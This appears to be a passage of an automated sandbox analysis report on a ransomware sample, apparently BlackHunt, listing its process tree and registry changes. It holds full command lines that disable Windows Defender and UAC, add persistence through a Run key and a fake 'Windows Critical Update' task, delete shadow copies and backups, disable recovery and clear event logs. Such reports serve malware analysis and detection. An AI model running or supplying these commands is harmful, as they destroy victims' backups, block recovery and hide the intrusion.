4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 107 PID 1756 wrote to memory of 1136 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 107 PID 1756 wrote to memory of 820 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 112 PID 1756 wrote to memory of 820 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 112 PID 1756 wrote to memory of 3592 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 116 PID 1756 wrote to memory of 3592 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 116 PID 1756 wrote to memory of 1020 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 117 PID 1756 wrote to memory of 1020 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 117 PID 1756 wrote to memory of 3996 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 118 PID 1756 wrote to memory of 3996 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 118 PID 1756 wrote to memory of 1940 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 120 PID 1756 wrote to memory of 1940 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 120 PID 1756 wrote to memory of 1748 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 125 PID 1756 wrote to memory of 1748 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 125 PID 4120 wrote to memory of 3516 4120 cmd.exe 121 PID 4120 wrote to memory of 3516 4120 cmd.exe 121 PID 1756 wrote to memory of 3500 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 127 PID 1756 wrote to memory of 3500 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 127 PID 1756 wrote to memory of 1724 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 126 PID 1756 wrote to memory of 1724 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 126 PID 1756 wrote to memory of 3648 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 132 PID 1756 wrote to memory of 3648 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 132 PID 1756 wrote to memory of 3628 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 131 PID 1756 wrote to memory of 3628 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 131 PID 5080 wrote to memory of 1152 5080 cmd.exe 163 PID 5080 wrote to memory of 1152 5080 cmd.exe 163 PID 856 wrote to memory of 664 856 cmd.exe 134 PID 856 wrote to memory of 664 856 cmd.exe 134 PID 1756 wrote to memory of 4252 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 152 PID 1756 wrote to memory of 4252 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 152 PID 1756 wrote to memory of 2720 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 136 PID 1756 wrote to memory of 2720 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 136 PID 1756 wrote to memory of 4624 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 151 PID 1756 wrote to memory of 4624 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 151 PID 4712 wrote to memory of 3400 4712 cmd.exe 139 PID 4712 wrote to memory of 3400 4712 cmd.exe 139 PID 1756 wrote to memory of 4668 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 140 PID 1756 wrote to memory of 4668 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 140 PID 4348 wrote to memory of 4448 4348 cmd.exe 150 PID 4348 wrote to memory of 4448 4348 cmd.exe 150 PID 1756 wrote to memory of 4608 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 149 PID 1756 wrote to memory of 4608 1756 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe 149 PID 404 wrote to memory of 1988 404 cmd.exe 143 PID 404 wrote to memory of 1988 404 cmd.exe 143 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe"C:\Users\Admin\AppData\Local\Temp\4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1756 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2380
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1136
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:820
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3592
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵
- Modifies registry class
PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1020
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1940
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1748
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1724
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3500
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:9736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3648
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:7576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:7608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:9512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4316
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:8288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:11352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:10272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:9660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3800
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:7480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe" /F2⤵PID:372
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\4be7bd24d4b5f1d006cfc28a5a327a0c643b0c160f8e8f48021da8681553bff3.exe" /F3⤵
- Creates scheduled task(s)
PID:6540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:5116
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:10524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1980
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4868
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:6976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3732
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5208
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:12672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5340
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:12832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5484
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:11720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5256
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:12616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5244
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:12744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5200
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:11592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:11396
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:13316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:20572
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:11124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:20496
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:24848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:11040
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:20780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:11008
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:25824
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:20996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:25768
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:21100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:20728
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:21260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:20760
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:21228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:20768
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:21200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:20808
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:21192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:20924
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:21452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:21076
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:23424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:21128
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:21648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:21276
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:21736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:13816
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:23492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:13880
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:21796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3008
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:21624
-
-
-
